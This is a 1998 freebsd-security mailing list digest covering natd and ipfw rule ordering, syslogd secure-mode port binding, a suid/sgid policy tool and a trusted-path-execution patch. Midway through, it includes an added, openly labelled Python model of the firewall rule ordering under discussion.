From owner-freebsd-security Sun Aug 23 08:17:31 1998
From: Robert Watson
Date: Sun, 23 Aug 1998 11:16:44 -0400 (EDT)
To: freebsd-security@FreeBSD.ORG
cc: robert+suidcontrol@cyrus.watson.org
Subject: Announcement: suidcontrol 0.1: suid/sgid policy editor and application software

suidcontrol 0.1

suidcontrol is an experimental utility for managing suid/sgid policy under FreeBSD. The primary intent is to allow system managers to generate scripts to apply to new FreeBSD installations so that they can minimize risk associated with the plethora of tools requiring additional privilege to run.

Please read the LICENSE file as well as the BUGS and WARNINGS sections of the README before proceeding, as this is DEVELOPMENTAL software. As it is experimental, it should not currently be applied to production machines unless you are absolutely sure. Needless to say, the license covers my absolute lack of responsibility for any problems you incur by not heeding this warning.
suidcontrol: http://www.watson.org/fbsd-hardening/suidcontrol.html
FreeBSD Hardening Project: http://www.watson.org/fbsd-hardening/
Contact email address: robert+suidcontrol@cyrus.watson.org

Robert N Watson
Carnegie Mellon University http://www.cmu.edu/
TIS Labs at Network Associates, Inc. http://www.tis.com/
SafePort Network Services http://www.safeport.com/
robert@fledge.watson.org http://www.watson.org/~robert/

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Aug 24 05:08:52 1998
From: Paul van der Zwan
Date: Mon, 24 Aug 1998 13:54:03 +0200
To: "laurens van alphen"
cc: security@FreeBSD.ORG
Subject: Re: natd and ipfw rules not working together
In-reply-to: Your message of "Thu, 20 Aug 1998 13:56:31 +0200."
Message-Id: <199808241154.NAA16992@trantor.stuyts.nl>

> hi all,
>
> this is my setup
> external net: 130.89/16 (ed0)
> internal net: 192.168.0/24 (ed1)
> running natd and ipfw on the router
>
> rc.firewall contains:
> $fwcmd add divert natd all from any to any via ${natd_interface}
> where natd_interface is ed0
>
> next the default rc.firewall contained these rules:
>
> $fwcmd add deny all from 192.168.0.0/16 to any via ${oif}
> $fwcmd add deny all from any to 192.168.0.0/16 via ${oif}
>
> when i apply those, natd clients (on the internal network) can no longer
> talk to the outside world. they can however talk to ${oip} and ${iip}.
>
> any clues? it seems to me natd should translate the packets coming from the
> internal network before the 192.168/16 rule sees 'em. right?
>

I haven't seen any useful followup. But apparently the translated packets are sent thru all filter rules after translation. Does anybody know a way to use rfc1918 addresses internally and still deny them when coming from outside?
I am using the same kind of setup here and I have to allow all addresses I use on the inside as destination addresses.
It would be nice if the rules could recognize packets that had been 'fixed' by natd.

Paul
--
Paul van der Zwan paulz @ trantor.stuyts.nl
"I think I'll move to theory, everything works in theory..."
From owner-freebsd-security Mon Aug 24 08:34:30 1998
From: Paul van der Zwan
Date: Mon, 24 Aug 1998 17:08:49 +0200
To: Neil Blakey-Milner
cc: security@FreeBSD.ORG
Subject: Re: natd and ipfw rules not working together
In-reply-to: Your message of "Mon, 24 Aug 1998 14:50:09 +0200." <19980824145009.A25487@rucus.ru.ac.za>
Message-Id: <199808241508.RAA04739@trantor.stuyts.nl>

> On Mon 1998-08-24 (13:54), Paul van der Zwan wrote:
> > I haven't seen any useful followup. But apparently the translated packets
> > are sent thru all filter rules after translation. Does anybody know a
> > way to use rfc1918 addresses internally and still deny them when coming
> > from outside.
>
> I'm not sure if this helps, but ipfw has a "skip" ability, which allows you
> to make a specified rule skip to a higher rule, bypassing intermediate rules.
>
> > I am using the same kind of setup here and I have to allow all addresses I use
> > on the inside as destination addresses.
> > It would be nice if the rules could recognize packets that had been 'fixed'
> > by natd.
>
> You might want to check on ipfw rules with "ACK" or "RST" (ipfw rule
> "established"), and "SYN" (ipfw rule setup), which should be adjusted by
> natd, but I'd make sure to deny all rfc1918 on the external interface first,
> and even then I'm not sure if this can't be bypassed by a craftily spoofed
> packet.
>

That is the problem: if I deny rfc1918 addresses I also deny packets translated by natd. There is AFAIK no way to tell these legitimate rfc1918-addressed packets from those coming in on the same interface containing an rfc1918 address from the start.

> I'm not sure if this helps, but maybe you can use "xmit ${natd_interface}"
> instead of "via ${natd_interface}" in your rule. Also, being more specific
> in your rules might be useful too. (replace those any to any's with more
> specific values)
>
> Also, you might want to debug things by using the "log" option to ipfw. For
> your natd stuff, try a "from not natd_network to natd_network in recv ${oif}"
> and a "from natd_network to not natd_network out recv ${natd_interface} xmit
> ${oif}".
>
> I'm not terribly sure about this, not able to test this right now, just
> throwing some ideas around.
>

This is the relevant part of my rules at the moment.
My laptop is using 192.168.200.95 and if I browse from that thing, the return packets bounce against the commented line, which must be there to deny rfc1918 packets coming in from the internet.
add divert natd ip from any to any via tun0
add allow ip from any to any via lo0
add allow ip from any to any via de0
add deny log ip from 127.0.0.0/8 to 127.0.0.0/8
add deny log all from 192.168.0.0:255.255.0.0 to any in recv tun0
#add deny log all from any to 192.168.0.0:255.255.0.0 in recv tun0
add deny log all from 172.16.0.0:255.240.0.0 to any in recv tun0
add deny log all from any to 172.16.0.0:255.240.0.0 in recv tun0
add deny log all from 10.0.0.0:255.0.0.0 to any in recv tun0
add deny log all from any to 10.0.0.0:255.0.0.0 in recv tun0

Regards
Paul
--
Paul van der Zwan paulz @ trantor.stuyts.nl
"I think I'll move to theory, everything works in theory..."

From owner-freebsd-security Mon Aug 24 08:57:50 1998
From: Brian Cully
Date: Mon, 24 Aug 1998 11:56:44 -0400
To: "Timothy R. Platt", security@FreeBSD.ORG
Subject: Re: Scaring the bezeesus out of your system admin as a normal user:
Reply-To: shmit@kublai.com
References: <199808211915.MAA18409@hub.freebsd.org>
In-Reply-To: from Timothy R. Platt on Sat, Aug 22, 1998 at 05:55:35AM -0700
Message-ID: <19980824115644.19643@kublai.com>

On Sat, Aug 22, 1998 at 05:55:35AM -0700, Timothy R. Platt wrote:
> Seems to me that if you specify -s, not only do you reject incoming
> packets, but you are prevented from sending packets to a remote logging
> machine as well.

No, you can send packets even if you use -s; -s only prevents a bind to the syslog port.

> -a will cause syslog to accept packets from a remote machine which would be
> ignored by default.

I don't think you need -s with -a. But the man page is unclear in this respect.
--
Brian Cully
``And when one of our comrades was taken prisoner, blindfolded, hung upside-down, shot, and burned, we thought to ourselves, `These are the best experiences of our lives''' -Pathology (Joe Frank, Somewhere Out There)

From owner-freebsd-security Mon Aug 24 09:04:57 1998
From: Neil Blakey-Milner
Date: Mon, 24 Aug 1998 18:01:48 +0200
To: Paul van der Zwan
Cc: security@FreeBSD.ORG
Subject: Re: natd and ipfw rules not working together
References: <19980824145009.A25487@rucus.ru.ac.za> <199808241508.RAA04739@trantor.stuyts.nl>
In-Reply-To: <199808241508.RAA04739@trantor.stuyts.nl>; from Paul van der Zwan on Mon, Aug 24, 1998 at 05:08:49PM +0200
Message-ID: <19980824180148.A11376@rucus.ru.ac.za>

On Mon 1998-08-24 (17:08), Paul van der Zwan wrote:
> add divert natd ip from any to any via tun0
> add allow ip from any to any via lo0
> add allow ip from any to any via de0
> add deny log ip from 127.0.0.0/8 to 127.0.0.0/8
> add deny log all from 192.168.0.0:255.255.0.0 to any in recv tun0
> #add deny log all from any to 192.168.0.0:255.255.0.0 in recv tun0
> add deny log all from 172.16.0.0:255.240.0.0 to any in recv tun0
> add deny log all from any to 172.16.0.0:255.240.0.0 in recv tun0
> add deny log all from 10.0.0.0:255.0.0.0 to any in recv tun0
> add deny log all from any to 10.0.0.0:255.0.0.0 in recv tun0

Ok, maybe I'm missing something here, but:

Why do you want to deny stuff from 192.168.0.0:255.255.0.0 that is coming via your tun0 device? I assume this is a modem connection between your work and home or something. You should be more interested in blocking the reserved IPs coming from other devices, surely?

You also might want to use rule numbers, to know which rules apply, and in which order. As far as I remember, the most recently applied rule at a number has precedence, and if you don't specify a number, it's given 0. Your most recent case regarding 192.168.0.0:255.255.0.0 would be deny (if you uncomment it).

Hope this helps.

Neil
--
Neil Blakey-Milner nbm@rucus.ru.ac.za

From owner-freebsd-security Mon Aug 24 09:33:16 1998
From: Paul Hart
Date: Mon, 24 Aug 1998 10:32:08 -0600 (MDT)
To: freebsd-security@FreeBSD.ORG
Subject: Re: Scaring the bezeesus out of your system admin as a normal user:
On Fri, 21 Aug 1998, Ben wrote:
> -s Operate in secure mode. Do not listen for log message from remote machines.

This is kind of a related question, but in 2.2.7-RELEASE syslogd appears to have been modified to bind to its UDP port even if it is run with the -s flag. It does discard packets received on the port (but still logs a message about it!), but should it not even bind to the port when running in secure mode? It didn't bind to the port in previous versions, if memory serves.

If this was a recent design decision that is meant to last, I think I will hack my syslogd back to the way it used to be.

Paul Hart
--
Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc.
hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/

From owner-freebsd-security Mon Aug 24 10:46:26 1998
From: Paul van der Zwan
Date: Mon, 24 Aug 1998 19:26:14 +0200
To: Neil Blakey-Milner
Cc: security@FreeBSD.ORG
Subject: Re: natd and ipfw rules not working together
In-reply-to: Your message of "Mon, 24 Aug 1998 18:01:48 +0200." <19980824180148.A11376@rucus.ru.ac.za>
Message-Id: <199808241726.TAA19285@trantor.stuyts.nl>

> On Mon 1998-08-24 (17:08), Paul van der Zwan wrote:
> > add divert natd ip from any to any via tun0
> > add allow ip from any to any via lo0
> > add allow ip from any to any via de0
> > add deny log ip from 127.0.0.0/8 to 127.0.0.0/8
> > add deny log all from 192.168.0.0:255.255.0.0 to any in recv tun0
> > #add deny log all from any to 192.168.0.0:255.255.0.0 in recv tun0
> > add deny log all from 172.16.0.0:255.240.0.0 to any in recv tun0
> > add deny log all from any to 172.16.0.0:255.240.0.0 in recv tun0
> > add deny log all from 10.0.0.0:255.0.0.0 to any in recv tun0
> > add deny log all from any to 10.0.0.0:255.0.0.0 in recv tun0
>
> Ok, maybe I'm missing something here, but:
>
> Why do you want to deny stuff from 192.168.0.0:255.255.0.0 that is coming via
> your tun0 device? I assume this is a modem connection between your work and
> home or something.
>

Tun0 is the modem connection to my ISP. My FreeBSD box is connected to a LAN on the de0 interface containing some other computers, using 192.168.200.x as addresses. I don't want any rfc1918 addresses coming in or going out on the link to my ISP. That is the reason for the rules above (which are a subset of all rules; they are followed by about 30 more).

> You should be more interested in blocking the reserved IPs coming from other
> devices, surely?

That is what I am trying to do. But by enabling the commented rule above I also block packets translated by natd, which I don't want to block but want to allow. Only there is no way to discriminate between packets having an rfc1918 destination from the start and those which get it from natd.
> You also might want to use rule numbers, to know which rules apply, and in
> which order. As far as I remember, the most recently applied rule at a
> number has precedence, and if you don't specify a number, it's given 0. Your
> most recent case regarding 192.168.0.0:255.255.0.0 would be deny (if you
> uncomment it).

I had rules numbered but I found it easier to put them all in a file and use ipfw flush followed by ipfw filename to load them all at once. It is too much trouble renumbering lines in the file if I inserted more lines than I left space for. If I see a deny in the log I usually use ipfw show if it is not immediately clear which rule is triggered.

> Hope this helps.

Not with my real problem, I'm afraid ;-)

Thanks
Paul
--
Paul van der Zwan paulz @ trantor.stuyts.nl
"I think I'll move to theory, everything works in theory..."

From owner-freebsd-security Mon Aug 24 10:53:50 1998
From: Kim Shrier
Organization: Shrier and Deihl
Date: Mon, 24 Aug 1998 12:51:45 -0500
To: security@FreeBSD.ORG
Subject: Re: natd and ipfw rules not working together
References: <199808241508.RAA04739@trantor.stuyts.nl>
Message-ID: <35E1A831.D12B41A7@tinker.com>

Paul van der Zwan wrote:
> That is the problem: if I deny rfc1918 addresses I also deny packets
> translated by natd. There is AFAIK no way to tell these legitimate
> rfc1918-addressed packets from those coming in on the same interface
> containing an rfc1918 address from the start.
-- snip --
> This is the relevant part of my rules at the moment.
> My laptop is using 192.168.200.95 and if I browse from that thing, the return
> packets bounce against the commented line, which must be there to deny
> rfc1918 packets coming in from the internet.
>
> add divert natd ip from any to any via tun0
> add allow ip from any to any via lo0
> add allow ip from any to any via de0
> add deny log ip from 127.0.0.0/8 to 127.0.0.0/8
> add deny log all from 192.168.0.0:255.255.0.0 to any in recv tun0
> #add deny log all from any to 192.168.0.0:255.255.0.0 in recv tun0
> add deny log all from 172.16.0.0:255.240.0.0 to any in recv tun0
> add deny log all from any to 172.16.0.0:255.240.0.0 in recv tun0
> add deny log all from 10.0.0.0:255.0.0.0 to any in recv tun0
> add deny log all from any to 10.0.0.0:255.0.0.0 in recv tun0
>
> Regards
> Paul
>
> --

You need to filter the rfc1918 addresses that are in the source field before you nat them. Also, you can save yourself some time by moving the lo0 and 127.0.0.0/8 rules above the divert rule.
Try the following:

add allow ip from any to any via lo0
add deny log ip from 127.0.0.0/8 to 127.0.0.0/8

add deny log all from any to 192.168.0.0:255.255.0.0 in recv tun0
add deny log all from any to 172.16.0.0:255.240.0.0 in recv tun0
add deny log all from any to 10.0.0.0:255.0.0.0 in recv tun0

add divert natd ip from any to any via tun0

add allow ip from any to any via de0
add deny log all from 192.168.0.0:255.255.0.0 to any in recv tun0
add deny log all from 192.168.0.0:255.255.0.0 to any in recv tun0
add deny log all from 172.16.0.0:255.240.0.0 to any in recv tun0
add deny log all from 10.0.0.0:255.0.0.0 to any in recv tun0

Kim Shrier kim@tinker.com

From owner-freebsd-security Mon Aug 24 13:18:54 1998
From: "laurens van alphen"
Date: Mon, 24 Aug 1998 22:17:26 +0200
Cc: "craxx e-consultants"
Subject: RE: natd and ipfw rules not working together
In-reply-to: <35E1A831.D12B41A7@tinker.com>
Message-ID: <000d01bdcf9c$365a7e70$0a00a8c0@uptight.student.utwente.nl>

hello,

>You need to filter the rfc1918 addresses that are in the source field
>before you nat them. Also, you can save yourself some time by moving
>the lo0 and 127.0.0.0/8 rules above the divert rule. Try the following:
>
>add allow ip from any to any via lo0
>add deny log ip from 127.0.0.0/8 to 127.0.0.0/8
>
>add deny log all from any to 192.168.0.0:255.255.0.0 in recv tun0
>add deny log all from any to 172.16.0.0:255.240.0.0 in recv tun0
>add deny log all from any to 10.0.0.0:255.0.0.0 in recv tun0
>
>add divert natd ip from any to any via tun0
>
>add allow ip from any to any via de0
>add deny log all from 192.168.0.0:255.255.0.0 to any in recv tun0
>add deny log all from 192.168.0.0:255.255.0.0 to any in recv tun0
>add deny log all from 172.16.0.0:255.240.0.0 to any in recv tun0
>add deny log all from 10.0.0.0:255.0.0.0 to any in recv tun0

tun0=ed0 here.

the problem here is that they probably hit natd alright (as before) but the natd'ed packets walk all the way from the top down.

situation:

inet --- [ 195.108.198.1 - natd - 192.168.0.1 ] --- clients

e.g. packet from 12.0.0.1 to 192.168.0.23 (e.g. SYN ACK)

real packet: from 12.0.0.1 to 195.108.198.1 (recv in ed0)
natd changes this to: from 12.0.0.1 to 192.168.0.23 (still recv in ed0)

and this packet starts at rule 0. natd doesn't touch the interfaces (maybe it should?)

now the rule:
add deny log all from any to 192.168.0.0:255.255.0.0 in recv ed0
will block this packet and it's dropped.

natd should either:
- mark packets as 'processed' so we can skip those later on.
- change the 'recv' interface

any ideas?

--
laurens van alphen
craxx e-consultants
alphen@craxx.com
http://craxx.com/
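The ordering problem laurens describes and Kim's reordered ruleset, modelled in Python as an added example (this is not code from the thread or from ipfw). It assumes the behaviour the thread's fix relies on: a packet natd rewrites re-enters ipfw at the rule after the divert rule, with its receive interface and direction unchanged; under laurens's "starts at rule 0" reading even the reordered set would fail, so confirm the semantics against ipfw(8) and divert(4) for your release. The public address and hosts are the ones in laurens's diagram, the natd session table and the packets are constructed, the 172.16/12 and 10/8 rule pairs are left out because they behave exactly like the 192.168/16 pair, and a trailing allow stands in for the thirty-odd rules Paul says follow his excerpt.

```python
import ipaddress

# Constructed for the demo, using the addresses in laurens's diagram: natd on
# tun0 with public address 195.108.198.1; 12.0.0.1 is talking to the inside
# host 192.168.0.23 (a constructed natd session table entry).
EXT_IF, EXT_IP = "tun0", "195.108.198.1"
NAT_SESSIONS = {"12.0.0.1": "192.168.0.23"}


def _net(spec):
    """ipfw address forms used in the thread: any, a.b.c.d/len, a.b.c.d:mask."""
    if spec == "any":
        return ipaddress.ip_network("0.0.0.0/0")
    if ":" in spec:
        addr, mask = spec.split(":", 1)
        return ipaddress.ip_network(f"{addr}/{mask}", strict=False)
    return ipaddress.ip_network(spec, strict=False)


def parse_rule(line):
    """'add ACTION [port] [log] PROTO from SRC to DST [via IF | in recv IF]'.
    Blank and commented-out lines give None; only the thread's subset of ipfw syntax."""
    words = line.split()
    if not words or words[0].startswith("#"):
        return None
    assert words[0] == "add", line
    action, i = words[1], 2
    if action == "divert":
        i += 1                        # skip the divert port name ("natd")
    if words[i] == "log":
        i += 1
    i += 1                            # protocol: "ip" and "all" both mean any here
    assert words[i] == "from" and words[i + 2] == "to", line
    src, dst, rest = _net(words[i + 1]), _net(words[i + 3]), words[i + 4:]
    iface = direction = None
    if rest[:1] == ["via"]:           # via IF: either direction on IF
        iface = rest[1]
    elif rest[:2] == ["in", "recv"]:  # in recv IF: only packets arriving on IF
        iface, direction = rest[2], "in"
    elif rest:
        raise ValueError(line)
    return {"action": action, "src": src, "dst": dst,
            "iface": iface, "dir": direction, "text": line}


def natd(pkt):
    """Inbound on the external interface, map the public destination back to
    the inside host of the session. Interface and direction are untouched,
    which is exactly laurens's point."""
    pkt = dict(pkt)
    if (pkt["iface"], pkt["dir"], pkt["dst"]) == (EXT_IF, "in", EXT_IP):
        pkt["dst"] = NAT_SESSIONS.get(pkt["src"], pkt["dst"])
    return pkt


def walk(ruleset, pkt):
    """Walk the rules in order; a diverted packet re-enters at the next rule.
    Returns (verdict, text of the deciding rule)."""
    for rule in filter(None, map(parse_rule, ruleset.splitlines())):
        if not (ipaddress.ip_address(pkt["src"]) in rule["src"]
                and ipaddress.ip_address(pkt["dst"]) in rule["dst"]
                and rule["iface"] in (None, pkt["iface"])
                and rule["dir"] in (None, pkt["dir"])):
            continue
        if rule["action"] == "divert":
            pkt = natd(pkt)
            continue
        return rule["action"], rule["text"]
    return "deny", "default rule (assumes a default-to-deny kernel)"


# Paul's ordering with the commented rule switched on (the one he needs).
PAUL_RULES = """
add divert natd ip from any to any via tun0
add allow ip from any to any via lo0
add allow ip from any to any via de0
add deny log ip from 127.0.0.0/8 to 127.0.0.0/8
add deny log all from 192.168.0.0:255.255.0.0 to any in recv tun0
add deny log all from any to 192.168.0.0:255.255.0.0 in recv tun0
# constructed stand-in for the ~30 rules Paul says follow his excerpt
add allow ip from any to any
"""

# Kim's ordering: private destinations checked before natd, private sources after.
KIM_RULES = """
add allow ip from any to any via lo0
add deny log ip from 127.0.0.0/8 to 127.0.0.0/8
add deny log all from any to 192.168.0.0:255.255.0.0 in recv tun0
add divert natd ip from any to any via tun0
add allow ip from any to any via de0
add deny log all from 192.168.0.0:255.255.0.0 to any in recv tun0
# constructed stand-in for the rest of the ruleset
add allow ip from any to any
"""

PACKETS = {  # constructed; all arriving on the ISP link
    "reply": {"src": "12.0.0.1", "dst": EXT_IP, "iface": "tun0", "dir": "in"},
    "spoof_dst": {"src": "12.0.0.1", "dst": "192.168.0.23", "iface": "tun0", "dir": "in"},
    "spoof_src": {"src": "192.168.5.5", "dst": EXT_IP, "iface": "tun0", "dir": "in"},
}


def demo():
    """Verdict for every packet under both orderings."""
    return {name: {label: walk(rules, pkt)[0] for label, pkt in PACKETS.items()}
            for name, rules in (("paul", PAUL_RULES), ("kim", KIM_RULES))}
```

Running `demo()` shows the SYN/ACK for the laptop denied under Paul's ordering by the "to 192.168.0.0:255.255.0.0 in recv tun0" rule (it is evaluated after natd has rewritten the destination) and allowed under Kim's, while a packet arriving from the ISP link with a private destination or a private source is denied under both; the destination check runs before translation, the source check after it, so neither depends on telling translated packets apart.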
From owner-freebsd-security Mon Aug 24 15:18:13 1998
From: Wes Peters
Organization: Softweyr LLC
Date: Mon, 24 Aug 1998 16:16:06 -0600
To: "Dag-Erling Coidan Smørgrav"
CC: freebsd-security@FreeBSD.ORG
Subject: Re: REQ: free pop3 daemon recommendations
References: <20938.903553244@axl.training.iafrica.com> <35DE1217.8472B1A1@softweyr.com>
Message-ID: <35E1E626.8B26000C@softweyr.com>

Dag-Erling Coidan Smørgrav wrote:
>
> Wes Peters writes:
> > imap-uw has had more than its share of security exploits of late, too.
> > The FreeBSD version has (hopefully) been patched to keep up with them.
>
> I'm aware of only one recent imap-uw exploit, in 4.1b IIRC. I'd be
> grateful for any information about other security problems with
> imap-uw.

That's probably the one I'm thinking of. IIRC, those who looked it over found the code a ripe ground for buffer overflows, and the code generally of poor "university hackathon" quality. Too bad Charlie Crittenden (my most stringent prof in CS) wasn't the principal investigator; the code would be prettier than a Pulitzer prize winning novel, AND work better, too. He was a gem.

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters
Softweyr LLC
http://www.softweyr.com/~softweyr
wes@softweyr.com

From owner-freebsd-security Mon Aug 24 19:21:51 1998
From: Archie Cobbs
Date: Mon, 24 Aug 1998 19:20:28 -0700 (PDT)
To: hart@iserver.com
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Scaring the bezeesus out of your system admin as a normal user:
In-Reply-To: from Paul Hart at "Aug 24, 98 10:32:08 am"
Message-Id: <199808250220.TAA17312@bubba.whistle.com>

Paul Hart writes:
> This is kind of a related question, but in 2.2.7-RELEASE syslogd appears
> to have been modified to bind to its UDP port even if it is run with the
> -s flag. It does discard packets received on the port (but still logs a
> message about it!), but should it not even bind to the port when running
> in secure mode? It didn't bind to the port in previous versions, if
> memory serves.
>
> If this was a recent design decision that is meant to last, I think I will
> hack my syslogd back to the way it used to be.

If you do, send it in with send-pr... this behavior seems kind of silly.

-Archie
___________________________________________________________________________
Archie Cobbs * Whistle Communications, Inc. * http://www.whistle.com

From owner-freebsd-security Tue Aug 25 09:34:07 1998
From: Nicholas Charles Brawn
Date: Wed, 26 Aug 1998 02:32:56 +1000 (EST)
To: freebsd-security@FreeBSD.ORG
Subject: trusted path execution patch

Modelled somewhat on route's patch released in phrack52 that performs the same function (for Linux though), I've written a small patch to kern_exec.c that does just about the same thing. For those not familiar with route's patch (Phrack 52, article 6), it limits the execution of binaries to those in directories designated as "trusted". That being (in this case), those that aren't writable by group or other, and are owned by either root, bin, or have the gid of a "trusted" group.
I've also hacked up access control for ld.so, to prevent unauthorised users using LD_LIBRARY_PATH and LD_PRELOAD to bypass the above patch. Configuration is via /etc/ld.access, which is the same format as login.access(5).

You can get the patches from http://rabble.uow.edu.au/~nick/security/tpe.html

I'd appreciate it if people could test it out and report back on any problems or improvements. :)

Regards,
Nick

--
Email: ncb05@uow.edu.au - http://rabble.uow.edu.au/~nick
Key fingerprint = DE 30 33 D3 16 91 C8 8D A7 F8 70 03 B7 77 1A 2A
"When in doubt, ask someone wiser than yourself..." -unknown

From owner-freebsd-security Tue Aug 25 10:31:52 1998
Message-ID: <35E2F4CC.5820504D@dal.net>
Date: Tue, 25 Aug 1998 10:30:52 -0700
From: Studded
Organization: Triborough Bridge & Tunnel Authority
X-Mailer: Mozilla 4.06 [en] (X11; I; FreeBSD 2.2.7-STABLE-0823 i386)
To: Archie Cobbs
CC: hart@iserver.com, freebsd-security@FreeBSD.ORG
Subject: Re: Scaring the bezeesus out of your system admin as a normal user:
References: <199808250220.TAA17312@bubba.whistle.com>

Archie Cobbs wrote:
>
> Paul Hart writes:
> > This is kind of a related question, but in 2.2.7-RELEASE syslogd appears
> > to have been modified to bind to its UDP port even if it is run with the
> > -s flag. It does discard packets received on the port (but still logs a
> > message about it!), but should it not even bind to the port when running
> > in secure mode? It didn't bind to the port in previous versions, if
> > memory serves.
> >
> > If this was a recent design decision that is meant to last, I think I will
> > hack my syslogd back to the way it used to be.
>
> If you do, send it in with send-pr... this behavior seems kind of silly.

This was discussed several months ago (check the archives for -Stable I think), but my understanding was that it was decided ultimately NOT to bind the port, otherwise I would have made more noise about it myself.

Doug

--
*** Chief Operations Officer, DALnet IRC network ***
When you don't know where you're going, every road will take you there.
- Yiddish Proverb

From owner-freebsd-security Tue Aug 25 13:02:51 1998
Date: Tue, 25 Aug 1998 14:45:26 -0500 (CDT)
From: James Wyatt
To: Paul Hart
cc: freebsd-security@FreeBSD.ORG
Subject: Re: Scaring the bezeesus out of your system admin as a normal user:
On Mon, 24 Aug 1998, Paul Hart wrote:
> On Fri, 21 Aug 1998, Ben wrote:
> > -s Operate in secure mode. Do not listen for log message from remote
> > machines.
> This is kind of a related question, but in 2.2.7-RELEASE syslogd appears
> to have been modified to bind to its UDP port even if it is run with the
> -s flag. It does discard packets received on the port (but still logs a
> message about it!), but should it not even bind to the port when running
> in secure mode? It didn't bind to the port in previous versions, if
> memory serves.

I would like to know if my syslogd receives packets from misconfigs or miscreants, but was thinking about using ipfw logging for it. This (IMHO, hackish) modification seems like too much of a bending from 'average' syslogd behaviour.

Also: has anyone had a daemon that allowed authentication (from somewhere not normally 'trusted' via something like S/Key) and then altered ipfw's rules to trust that site/host for a while? Like the securecard stuff where you telnet to the router, respond to a challenge, and then it anoints you for a count (once!) or time for telnet or ftp connect and then doesn't trust that net/address again.

A daemon could bind to a given port, wait for a connect, perform authentication, query what level of access, enable host access, wait for a given period, and disable host access. The tricky part is limiting the number of connections: ipfw doesn't seem to know connection state. If I remove the routing rules the existing connections are dead. If I limit connects and allow other TCP packets through, I am exposed to session hijacking.

Oh well, I was just curious if anyone else had done it, enough jabbering... Thanks, and I *really* appreciate the amount of work that's gone into ipfw.
James Wyatt (jwyatt@rwsystems.net)

From owner-freebsd-security Tue Aug 25 13:35:14 1998
From: Archie Cobbs
Message-Id: <199808252033.NAA15314@bubba.whistle.com>
Subject: Re: Scaring the bezeesus out of your system admin as a normal user:
In-Reply-To: <35E2F4CC.5820504D@dal.net> from Studded at "Aug 25, 98 10:30:52 am"
To: Studded@dal.net (Studded)
Date: Tue, 25 Aug 1998 13:33:58 -0700 (PDT)
Cc: hart@iserver.com, freebsd-security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL38 (25)]

Studded writes:
> > > This is kind of a related question, but in 2.2.7-RELEASE syslogd appears
> > > to have been modified to bind to its UDP port even if it is run with the
> > > -s flag. It does discard packets received on the port (but still logs a
> > > message about it!), but should it not even bind to the port when running
> > > in secure mode? It didn't bind to the port in previous versions, if
> > > memory serves.
> > >
> > > If this was a recent design decision that is meant to last, I think I will
> > > hack my syslogd back to the way it used to be.
> >
> > If you do, send it in with send-pr... this behavior seems kind of silly.
>
> This was discussed several months ago (check the archives for -Stable I
> think), but my understanding was that it was decided ultimately NOT to
> bind the port otherwise I would have made more noise about it myself.

Actually, he's right.. the -current syslogd will bind to the UDP port no matter whether -s is specified or not. It does drop packets (and log a warning) if it receives anything when -s is set.

It looks like this is done because syslogd still needs a UDP socket from which to forward log entries when told to do so in /etc/syslog.conf. Guess that makes sense.

-Archie

___________________________________________________________________________
Archie Cobbs * Whistle Communications, Inc. * http://www.whistle.com

From owner-freebsd-security Wed Aug 26 02:44:55 1998
From: ark@eltex.ru
Date: Wed, 26 Aug 1998 13:47:07 GMT
Message-Id: <199808261347.NAA10214@paranoid.eltex.spb.ru>
In-Reply-To: from "James Wyatt "
Organization: "Klingon Imperial Intelligence Service"
Subject: Re: Scaring the bezeesus out of your system admin as a normal user:
To: jwyatt@rwsystr.RWSystems.net
Cc: hart@iserver.com, freebsd-security@FreeBSD.ORG

nuqneH,

There was a thing in ipfilter (drop away that damn ipfw! ;) called ipauth - AFAIR it was a userspace authentication interface for filtering rules.

James Wyatt said :
> Also: has anyone had a daemon that allowed authentication (from somewhere
> not normally 'trusted' via something like s-key) and then altered ipfw's
> rules to trust that site/host for a while? Like the securecard stuff where
> you telnet to the router, respond to a challenge, and then it annoints you
> for a count (once!) or time for telnet or ftp connect and then doesn't
> trust that net/address again.
> James Wyatt (jwyatt@rwsystems.net)

CU in Hell /Arkan#iD
Do I believe in the Bible? Hell, man, I've seen one!
From owner-freebsd-security Wed Aug 26 14:01:18 1998
Message-ID: <35E4774B.53D0AA7C@dal.net>
Date: Wed, 26 Aug 1998 13:59:55 -0700
From: Studded
Organization: Triborough Bridge & Tunnel Authority
X-Mailer: Mozilla 4.06 [en] (X11; I; FreeBSD 2.2.7-STABLE-0823 i386)
To: Archie Cobbs
CC: hart@iserver.com, freebsd-security@FreeBSD.ORG
Subject: Re: Scaring the bezeesus out of your system admin as a normal user:
References: <199808252033.NAA15314@bubba.whistle.com>

Archie Cobbs wrote:
> Actually, he's right.. the -current syslogd will bind to the UDP port
> no matter whether -s is specified or not. It does drop packets (and log
> a warning) if it receives anything when -s is set.
>
> It looks like this is done because syslogd still needs a UDP socket
> from which to forward log entries when told to do so in /etc/syslog.conf.

It makes sense IF that directive is there in the conf file. I don't forward anything and I don't want to receive anything either.

Doug
(PS, this is happening on -stable too)

--
*** Chief Operations Officer, DALnet IRC network ***
When you don't know where you're going, every road will take you there.
- Yiddish Proverb

From owner-freebsd-security Wed Aug 26 14:06:11 1998
Date: Wed, 26 Aug 1998 16:09:26 -0400 (EDT)
From: jtb
To: Nicholas Charles Brawn
cc: freebsd-security@FreeBSD.ORG
Subject: Re: trusted path execution patch

While working on my hardened FreeBSD kernel last fall I had many discussions with Brian Matthews and Tom Ptacek about the TPE implementation I wanted to put into my kernel. As I was talking to Tom we got to discussing daemon9 (route)'s implementation of TPE in the Linux kernel, and Tom had told me that he had an alternate way of doing it. I have yet to implement it in my kernel as I have very little experience dealing with inode/vnode/namei information on files and directories.
Anyway, Tom explained to me that the way he had done it was to create a linked list of trusted directories where applications could be executed out of, and at runtime to have execve() check whether or not said file was in one of said directories. Like I said, I don't know enough about namei information retrieval to implement this, but if someone wants to give me a hand I'd be more than willing to help them implement it; also, if anyone else is doing something similar let me know, I'd be glad to lend a hand.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Jonathan T. Bowie ADM w00w00 WSD
jobe@sekurity.org jtb@pubnix.org jobe@dataforce.net
Independent Security Developer Home: (603)436-5698
